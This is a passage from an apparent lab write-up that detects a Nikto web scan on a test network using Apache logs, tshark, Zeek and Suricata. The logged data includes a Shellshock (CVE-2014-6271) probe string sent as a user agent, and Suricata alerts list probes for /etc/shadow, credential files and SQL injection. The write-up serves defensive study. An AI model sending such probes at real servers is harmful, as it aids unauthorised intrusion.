</div><div><br /></div><div>Above, the host at <i>10.0.0.106</i> was targeted via IPv4. We will also write the content out to a file and disable SSL. At the same time, don't show the 404 messages and most importantly, use option "<i>Tuning 1</i>".</div><div><div><br /></div><div>Based on the response above, it seems only one "<i>interesting</i>" file, in this case a directory was found.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div></div><div><br /></div><div><div>How many times was the "threat actor's IP" seen in the logs?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 1 --delimiter=' ' | uniq --count </span>
<span style="color: white;"> 2596 10.0.0.107</span>
</pre></div>
</div><div><br /></div><div><div>Above shows 2596 occurrences of this IP in the Apache <i>access.log</i> file.</div><div><br /></div><div>Interestingly, we know Nikto is the tool used to target our environment, is there any evidence of Nikto in our logs? Let's find out.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep nikto </span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:39 -0400] "PUT /</span><span style="color: #fcff01;">nikto</span><span style="color: white;">-test-Bqe4RxLj.html HTTP/1.1" 405 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div><div>We see one above, "<i>PUT /nikto-test-Bqe4RxLj.html HTTP/1.</i>1", at this point, this is the only evidence of Nikto being used. Not sure if you noticed it but the user agent says nothing about Nikto by default.</div><div><br /></div><div>Talking about user agents, I believe this is a great source of threat intelligence (even though it can be easily spoofed). Let's see what is in our logs.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 6 --delimiter='"' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2408 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="color: white;"> 123 () { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;</span>
</pre></div>
</div><div><br /></div><div>We saw earlier that there was a <i>PUT</i> method. Taking a closer look at what other methods are there and how was the access being attempted.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 2 --delimiter=']' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields 1 --delimiter='/' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2586 "GET </span>
<span style="color: white;"> 2 "TRACK </span>
<span style="color: white;"> 1 "UVMGSHXG </span>
<span style="color: white;"> 1 "TRACE </span>
<span style="color: white;"> 1 "PUT </span>
<span style="color: white;"> 1 "PROPFIND </span>
<span style="color: white;"> 1 "OPTIONS * HTTP</span>
<span style="color: white;"> 1 "OPTIONS </span>
<span style="color: white;"> 1 "GET . HTTP</span>
<span style="color: white;"> 1 "DEBUG </span>
</pre></div>
</div><div><br /></div><div><div>Not much surprise that the <i>GET</i> method is most seen. Interesting, looking at RFC 2616 "Hypertext Transfer Protocol -- HTTP/1.1", I see <i>GET, PUT, TRACE </i>and <i>OPTIONS</i>. I don't see anything for <i>TRACK, UVMGSHXG, PROPFIND</i> or <i>DEBUG</i>. Where did these comes from?!</div><div><br /></div><div><i>PROPFIND</i> is part of <i>RFC4918</i> "HTTP Extensions for Web Distributed Authoring and Versioning (WebDAV)" and can be used to retrieve directory information. <i>TRACK</i> is Microsoft's implementation similar to <i>TRACE</i>.</div><div><br /></div><div>Rather than going through all these methods, let's instead look at the status codes returned by the server for possible clues on how to further our investigation.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | cut --field 2 --delimiter=']'| \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields=3 --delimiter='"' | cut --fields=2 --delimiter=' ' | sort | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 2496 404</span>
<span style="color: white;"> 51 </span>
<span style="color: white;"> 21 302</span>
<span style="color: white;"> 13 ./.\\\</span>
<span style="color: white;"> 5 400</span>
<span style="color: white;"> 4 403</span>
<span style="color: white;"> 4 200</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
</pre></div>
</div><div><br /></div><div><div>Nice to see the majority of requests returned <i>404</i> - Not Found. There is a lot to poke through but I will not waste time on any of the 400 series errors as these are all "<i>Client Error</i>"</div><div><br /></div><div>Let's instead focus on status code <i>200 "Successful"</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat access.log | grep "10.0.0.107" | grep --perl-regexp '\s+200?\s+' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator='Mozilla' '{ print $1 }'</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:40 -0400] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:41 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:41 -0400] "TRACE / HTTP/1.0" 200 192 "-" "</span>
<span style="color: white;">10.0.0.107 - - [11/May/2023:16:07:42 -0400] "GET /img/ HTTP/1.1" 200 1214 "-" "</span>
</pre></div>
</div><div><br /></div><div><div>The last line shows the '"<i>GET /img/ HTTP/1.1" 200'</i>, this suggest the response "<i>+ /img/:</i> This might be interesting." which was returned in Nikto's output above, is more likely associated with this.</div><div><br /></div><div>At this point, no need for additional log analysis. There is nothing "threatening" in the logs.</div></div><div><br /></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span> </b></div><div><br /></div><div><div>Setup for packet analysis. Capture packets on ports <i>80 or 443</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ tshark -n -w tuning_1.pcap -f 'tcp port(80 or 443)' --interface eth0</span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:395047) 16:07:08.756192 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:395047) 16:07:08.756254 [Main MESSAGE] -- File: "tuning_1.pcap"</span>
<span style="color: white;">5808 ^C</span>
</pre></div>
</div><div><br /></div><div><div>With the capture in place, let's do some analysis.</div><div><br /></div><div>What are the protocols seen in the PCAP.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z io,phs</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:5808 bytes:2283533</span>
<span style="color: white;"> ip frames:5808 bytes:2283533</span>
<span style="color: white;"> tcp frames:5808 bytes:2283533</span>
<span style="color: white;"> http frames:5189 bytes:2214997</span>
<span style="color: white;"> data-text-lines frames:2574 bytes:1523618</span>
<span style="color: white;"> urlencoded-form frames:1 bytes:358</span>
<span style="color: white;"> media frames:1 bytes:603</span>
<span style="color: white;"> tcp.segments frames:1 bytes:603</span>
<span style="color: white;"> tcp.segments frames:1 bytes:60</span>
<span style="color: white;"> http frames:1 bytes:60</span>
<span style="color: white;"> message-http frames:1 bytes:60</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at IP conversations, we see communications between two hosts and for a total of 5808 frames or 2,283 kB</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,ip</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">IPv4 Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107 <-> 10.0.0.106 2869 1,578 kB 2939 704 kB 5808 2,283 kB 0.000000000 6.6385</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div>How did the two hosts communicate? Let's figure that out by looking at the TCP conversations. I choose TCP because there is no UDP data in the protocol hierarchy show above. Looking at the conversations with a focus on the duration, frames and the bytes suggest this is more reconnaissance activity as the bytes and frame are similar.</div><div><br /></div><div>Some may even see this as possible beaconing activity because of the consistency of frame and bytes to this particular destination (10.0.0.106) on the particular port (80). We know it is now because we are doing this scenario ;-). </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,tcp | more</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107:37652 <-> 10.0.0.106:80 104 59 kB 106 27 kB 210 86 kB 1.456681410 0.2623</span>
<span style="color: white;">10.0.0.107:38216 <-> 10.0.0.106:80 104 59 kB 106 26 kB 210 86 kB 4.558459670 0.4762</span>
<span style="color: white;">10.0.0.107:37538 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.000000000 0.2090</span>
<span style="color: white;">10.0.0.107:37550 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.209464854 0.2453</span>
<span style="color: white;">10.0.0.107:37554 <-> 10.0.0.106:80 104 59 kB 105 25 kB 209 85 kB 0.454103547 0.163</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Overall, how many TCP conversations are there?</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -q -z conv,tcp | sed '1,5d;$d;/^$/d' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">wc --lines </span>
<span style="color: white;">84</span>
</pre></div>
</div><div><br /></div><div><div>How many unique streams do I have in this PCAP? Well you just got the answer above. This is just another way to confirm.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -T fields -e tcp.stream | sort | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">84</span>
</pre></div>
</div><div><br /></div><div><div>With 84 streams, where do we start? Taking a look at the packets TCP payload lengths, while returning the matching stream number.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -T fields -e tcp.len -e tcp.stream | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --numeric-sort --key=1 --reverse | more </span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1460 4</span>
<span style="color: white;">1443 13</span>
<span style="color: white;">742 6</span>
<span style="color: white;">660 81</span>
<span style="color: white;">607 0</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div>Stream <i>4 </i>looks to be the biggest at <i>1460</i> bytes long. Peaking into stream <i>4</i>. This returned a number of entries with <i>404 </i>errors.</div><div><div><br /></div><div>There was however, one response with <i>200 OK</i> and a <i>302 Found</i></div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp '^HTTP/1.1' | sort | uniq --count | sort --numeric-sort --reverse</span>
<span> 80 </span><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">404</span> <span>Not Found</span>
<span>4 HTTP/1.1 302 Found</span>
<span>1 HTTP/1.1 400 Bad Request</span>
<span>1 HTTP/1.1 200 OK</span></span>
</pre></div>
</div><div><br /></div><div>Finding records where the HTTP response code is <i>200.</i></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -Y 'http.response.code == 200'</span>
<span> 967 0.944983715 10.0.0.106 → 10.0.0.107 HTTP 603 </span><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">200</span> <span>OK (image/x-icon)</span>
<span>1363 1.441673139 10.0.0.106 → 10.0.0.107 HTTP 241 HTTP/1.1 200 OK </span>
<span>1381 1.450651187 10.0.0.106 → 10.0.0.107 HTTP 60 HTTP/1.1 200 OK (message/http)</span>
<span>1951 2.310611664 10.0.0.106 → 10.0.0.107 HTTP 1497 HTTP/1.1 200 OK (text/html)</span></span>
</pre></div>
</div><div><br /></div><div><div>Looking a bit deeper</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ tshark -n -r tuning_1.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -E header=y</span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 4</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 8</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 9</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 13</span>
</pre></div>
</div><div><br /></div><div><div>Following the stream <i>8 </i>to see what's going on inside. We see this was an <i>OPTIONS </i>request </div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,8 | grep --perl-regexp '200 OK' --after-context=5 --before-context=7 </span>
<span style="font-weight: bold;">OPTIONS</span> <span>*</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
187
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 20:07:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 0
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
</span></pre></div>
</div><div><br /></div><div><div>Above, just seem to be looking for the HTTP communication options available on the server.</div><div><br /></div><div>Let's see what stream <i>13</i> has.</div></div><div><br /></div><div><span style="color: white;"><!--HTML generated using hilite.me--></span><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span>└─$ tshark -n -r tuning_1.pcap -q -z follow,tcp,ascii,13 | \</span></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>grep --perl-regexp '200 OK' --after-context=5 --before-context=7 </span>
<span style="font-weight: bold;">GET</span> <span>/img/</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
1443
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 20:07:42 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Content-Length: 1214
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive</span>
</pre></div>
</div><div><br /></div><div><div>Looks like we found one entry, where the response was successful. This in turns ties into what we found via our log analysis.</div><div><br /></div><div>Closing out the packet analysis.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div></div><div><br /></div><div><div>Setup Zeek</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div><div>What logs were created for this activity?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ ls</span>
<span style="color: white;">conn.log dhcp.log dns.log files.log http.log packet_filter.log reporter.log weird.log</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the <i>conn.log</i> file to see what communication is there for response code 200.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp '\s+200\s+' | awk --field-separator=' ' '{ print $1" " $3":"$4 " " $5":"$6 " " $8 " " $9 " " $10 }' </span>
<span style="color: white;">1683835691.086935 10.0.0.107:37570 10.0.0.106:80 GET 10.0.0.106 /favicon.ico</span>
<span style="color: white;">1683835691.585128 10.0.0.107:37616 10.0.0.106:80 OPTIONS 10.0.0.106 *</span>
<span style="color: white;">1683835691.592865 10.0.0.107:37630 10.0.0.106:80 TRACE - /</span>
<span style="color: white;">1683835692.447548 10.0.0.107:37658 10.0.0.106:80 GET 10.0.0.106 /img/</span>
</pre></div>
</div><div><br /></div><div><div>The last one, matters the most as we can see the "<i>/img/</i>"</div><div><br /></div><div>In the other logs, there are nothing meaningful.</div><div><br /></div><div>P.S. It would have been a lot easier to use <i>zeek-cut</i> to answer above but <i>zeek-cut</i> is not available on Kali and I'm only interested in solving my problem. Not about a particular tool.</div></div><div><br /></div><div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div></div><div><br /></div><div><div>Setup Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><div><br /></div><div><div>How many alerts triggered for this activity?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | wc --lines </span>
<span style="color: white;">65</span>
</pre></div>
</div><div><br /></div><div><div>What about unique alerts.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | wc --lines</span>
<span style="color: white;">18</span>
</pre></div>
</div><div><br /></div><div><div>Looking at those 18 alerts and their frequency.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[\*\*\].*?\[\**\]' --only-matching | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 38 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**]</span>
<span style="color: white;"> 5 [**] [1:2101201:11] GPL WEB_SERVER 403 Forbidden [**]</span>
<span style="color: white;"> 3 [**] [1:2101877:11] GPL WEB_SERVER printenv access [**]</span>
<span style="color: white;"> 3 [**] [1:2100977:15] GPL EXPLOIT .cnf access [**]</span>
<span style="color: white;"> 2 [**] [1:2019904:5] ET EXPLOIT QNAP Shellshock CVE-2014-6271 [**]</span>
<span style="color: white;"> 2 [**] [1:2009485:7] ET WEB_SERVER /etc/shadow Detected in URI [**]</span>
<span style="color: white;"> 1 [**] [1:2260002:1] SURICATA Applayer Detect protocol only one direction [**]</span>
<span style="color: white;"> 1 [**] [1:2221028:1] SURICATA HTTP Host header invalid [**]</span>
<span style="color: white;"> 1 [**] [1:2102073:7] GPL WEB_SERVER globals.pl access [**]</span>
<span style="color: white;"> 1 [**] [1:2101402:9] GPL EXPLOIT iissamples access [**]</span>
<span style="color: white;"> 1 [**] [1:2101401:11] GPL EXPLOIT /msadc/samples/ access [**]</span>
<span style="color: white;"> 1 [**] [1:2101013:12] GPL EXPLOIT fpcount access [**]</span>
<span style="color: white;"> 1 [**] [1:2100952:10] GPL WEB_SERVER author.exe access [**]</span>
<span style="color: white;"> 1 [**] [1:2044504:1] ET INFO Request for Visual Studio Code sftp.json - Possible Information Leak [**]</span>
<span style="color: white;"> 1 [**] [1:2034253:2] ET SCAN FTPSync Settings Disclosure Attempt [**]</span>
<span style="color: white;"> 1 [**] [1:2015940:4] ET SCAN SFTP/FTP Password Exposure via sftp-config.json [**]</span>
<span style="color: white;"> 1 [**] [1:2010766:12] ET POLICY Proxy TRACE Request - inbound [**]</span>
<span style="color: white;"> 1 [**] [1:2006445:14] ET WEB_SERVER Possible SQL Injection Attempt SELECT FROM [**]</span>
</pre></div>
